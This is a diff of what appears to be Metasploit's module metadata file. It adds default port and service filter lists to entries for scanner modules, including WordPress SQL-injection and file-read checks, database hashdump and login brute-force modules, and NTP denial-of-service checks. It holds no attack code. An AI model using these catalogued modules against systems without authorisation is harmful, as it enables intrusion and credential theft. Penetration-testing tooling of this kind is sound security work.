-20412,6 +27982,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb", @@ -20449,6 +28034,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb", @@ -20482,6 +28082,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-06-14 13:28:03 +0000", "path": "/modules/auxiliary/scanner/http/wordpress_login_enum.rb", @@ -20514,6 +28129,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb", @@ -20548,6 +28178,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/scanner/http/wordpress_pingback_access.rb", @@ -20577,6 +28222,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wordpress_scanner.rb", @@ -20608,6 +28268,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb", @@ -20643,6 +28318,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-03 12:21:38 +0000", "path": "/modules/auxiliary/scanner/http/wp_arbitrary_file_deletion.rb", @@ -20674,6 +28364,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb", @@ -20707,6 +28412,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb", @@ -20738,6 +28458,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb", @@ -20770,6 +28505,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb", @@ -20801,6 +28551,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb", @@ -20832,6 +28597,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb", @@ -20863,6 +28643,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb", @@ -20895,6 +28690,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb", @@ -20924,6 +28734,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/xpath.rb", @@ -20955,6 +28780,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/yaws_traversal.rb", @@ -20984,6 +28824,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/zabbix_login.rb", @@ -21014,6 +28869,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb", @@ -21044,6 +28914,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb", @@ -21077,6 +28962,12 @@ "platform": "", "arch": "", "rport": 500, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.rb", @@ -21106,6 +28997,12 @@ "platform": "", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/imap/imap_version.rb", @@ -21135,6 +29032,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ip/ipidseq.rb", @@ -21169,6 +29072,12 @@ "platform": "", "arch": "", "rport": 623, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb", @@ -21203,6 +29112,12 @@ "platform": "", "arch": "", "rport": 623, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb", @@ -21233,6 +29148,12 @@ "platform": "", "arch": "", "rport": 623, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ipmi/ipmi_version.rb", @@ -21263,6 +29184,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum.rb", @@ -21292,6 +29219,12 @@ "platform": "", "arch": "", "rport": 4672, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/kademlia/server_info.rb", @@ -21321,6 +29254,12 @@ "platform": "", "arch": "", "rport": 5355, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/llmnr/query.rb", @@ -21350,6 +29289,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-21 08:50:26 +0000", "path": "/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb", @@ -21379,6 +29333,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/lotus/lotus_domino_login.rb", @@ -21408,6 +29377,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/lotus/lotus_domino_version.rb", @@ -21437,6 +29421,12 @@ "platform": "", "arch": "", "rport": 5353, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mdns/query.rb", @@ -21469,6 +29459,12 @@ "platform": "", "arch": "", "rport": 11211, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-03-06 16:04:00 +0000", "path": "/modules/auxiliary/scanner/memcached/memcached_amp.rb", @@ -21498,6 +29494,12 @@ "platform": "", "arch": "", "rport": 11211, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-03-06 18:16:22 +0000", "path": "/modules/auxiliary/scanner/memcached/memcached_udp_version.rb", @@ -21527,6 +29529,12 @@ "platform": "", "arch": "", "rport": 5920, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/cctv_dvr_login.rb", @@ -21561,6 +29569,12 @@ "platform": "", "arch": "", "rport": 4786, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-21 21:33:29 +0000", "path": "/modules/auxiliary/scanner/misc/cisco_smart_install.rb", @@ -21593,6 +29607,12 @@ "platform": "", "arch": "", "rport": 3310, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/clamav_control.rb", @@ -21626,6 +29646,12 @@ "platform": "", "arch": "", "rport": 37777, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb", @@ -21657,6 +29683,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb", @@ -21687,6 +29728,12 @@ "platform": "", "arch": "", "rport": 831, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb", @@ -21717,6 +29764,12 @@ "platform": "", "arch": "", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb", @@ -21749,6 +29802,12 @@ "platform": "", "arch": "", "rport": 1099, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/java_rmi_server.rb", @@ -21778,6 +29837,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/oki_scanner.rb", @@ -21807,6 +29872,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb", @@ -21837,6 +29908,12 @@ "platform": "", "arch": "", "rport": 9000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb", @@ -21866,6 +29943,12 @@ "platform": "", "arch": "", "rport": 13364, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb", @@ -21898,6 +29981,12 @@ "platform": "", "arch": "", "rport": 32764, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb", @@ -21927,6 +30016,12 @@ "platform": "", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb", @@ -21959,6 +30054,12 @@ "platform": "", "arch": "", "rport": 998, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb", @@ -21989,6 +30090,12 @@ "platform": "", "arch": "", "rport": 27017, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-22 08:03:12 +0000", "path": "/modules/auxiliary/scanner/mongodb/mongodb_login.rb", @@ -22018,6 +30125,12 @@ "platform": "", "arch": "", "rport": 407, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/motorola/timbuktu_udp.rb", @@ -22047,6 +30160,13 @@ "platform": "", "arch": "", "rport": 1883, + "autofilter_ports": [ + 1883, + 8883 + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-12-20 18:44:43 +0000", "path": "/modules/auxiliary/scanner/mqtt/connect.rb", @@ -22076,6 +30196,12 @@ "platform": "", "arch": "", "rport": 55553, + "autofilter_ports": [ + 3790 + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-14 06:34:04 +0000", "path": "/modules/auxiliary/scanner/msf/msf_rpc_login.rb", @@ -22105,6 +30231,22 @@ "platform": "", "arch": "", "rport": 3790, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 55553 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/msf/msf_web_login.rb", @@ -22134,6 +30276,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mssql/mssql_hashdump.rb", @@ -22163,6 +30319,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mssql/mssql_login.rb", @@ -22192,6 +30362,20 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mssql/mssql_ping.rb", @@ -22221,6 +30405,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-08-31 14:08:27 +0000", "path": "/modules/auxiliary/scanner/mssql/mssql_schemadump.rb", @@ -22253,6 +30451,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb", @@ -22283,6 +30487,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mysql/mysql_file_enum.rb", @@ -22312,6 +30522,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-02-08 13:48:24 +0000", "path": "/modules/auxiliary/scanner/mysql/mysql_hashdump.rb", @@ -22341,6 +30557,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mysql/mysql_login.rb", @@ -22370,6 +30592,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mysql/mysql_schemadump.rb", @@ -22399,6 +30627,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mysql/mysql_version.rb", @@ -22428,6 +30662,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb", @@ -22457,6 +30697,12 @@ "platform": "", "arch": "", "rport": 5351, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb", @@ -22486,6 +30732,12 @@ "platform": "", "arch": "", "rport": 1241, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-09-20 21:25:34 +0000", "path": "/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb", @@ -22515,6 +30767,21 @@ "platform": "", "arch": "", "rport": 8834, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-10-14 11:16:41 +0000", "path": "/modules/auxiliary/scanner/nessus/nessus_rest_login.rb", @@ -22544,6 +30811,21 @@ "platform": "", "arch": "", "rport": 8834, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb", @@ -22573,6 +30855,21 @@ "platform": "", "arch": "", "rport": 8834, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb", @@ -22602,6 +30899,12 @@ "platform": "", "arch": "", "rport": 137, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/netbios/nbname.rb", @@ -22631,6 +30934,21 @@ "platform": "", "arch": "", "rport": 3780, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb", @@ -22661,6 +30979,12 @@ "platform": "", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/nfs/nfsmount.rb", @@ -22693,6 +31017,12 @@ "platform": "", "arch": "", "rport": 119, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/nntp/nntp_login.rb", @@ -22725,6 +31055,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ntp/ntp_monlist.rb", @@ -22758,6 +31094,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb", @@ -22789,6 +31131,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb", @@ -22820,6 +31168,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb", @@ -22851,6 +31205,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ntp/ntp_readvar.rb", @@ -22882,6 +31242,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb", @@ -22913,6 +31279,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb", @@ -22944,6 +31316,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb", @@ -22973,6 +31351,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb", @@ -23002,6 +31395,12 @@ "platform": "", "arch": "", "rport": 9390, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-09-25 09:10:10 +0000", "path": "/modules/auxiliary/scanner/openvas/openvas_omp_login.rb", @@ -23031,6 +31430,12 @@ "platform": "", "arch": "", "rport": 9391, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-09-25 09:10:10 +0000", "path": "/modules/auxiliary/scanner/openvas/openvas_otp_login.rb", @@ -23060,6 +31465,21 @@ "platform": "", "arch": "", "rport": 1158, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/oracle/emc_sid.rb", @@ -23090,6 +31510,21 @@ "platform": "", "arch": "", "rport": 5560, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/oracle/isqlplus_login.rb", @@ -23120,6 +31555,21 @@ "platform": "", "arch": "", "rport": 5560, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb", @@ -23149,6 +31599,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-14 17:36:18 +0000", "path": "/modules/auxiliary/scanner/oracle/oracle_hashdump.rb", @@ -23181,6 +31637,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/oracle/oracle_login.rb", @@ -23210,6 +31672,12 @@ "platform": "", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/oracle/sid_brute.rb", @@ -23240,6 +31708,12 @@ "platform": "", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/oracle/sid_enum.rb", @@ -23269,6 +31743,21 @@ "platform": "", "arch": "", "rport": 1158, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/oracle/spy_sid.rb", @@ -23298,6 +31787,12 @@ "platform": "", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/oracle/tnslsnr_version.rb", @@ -23328,6 +31823,12 @@ "platform": "", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/oracle/tnspoison_checker.rb", @@ -23357,6 +31858,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 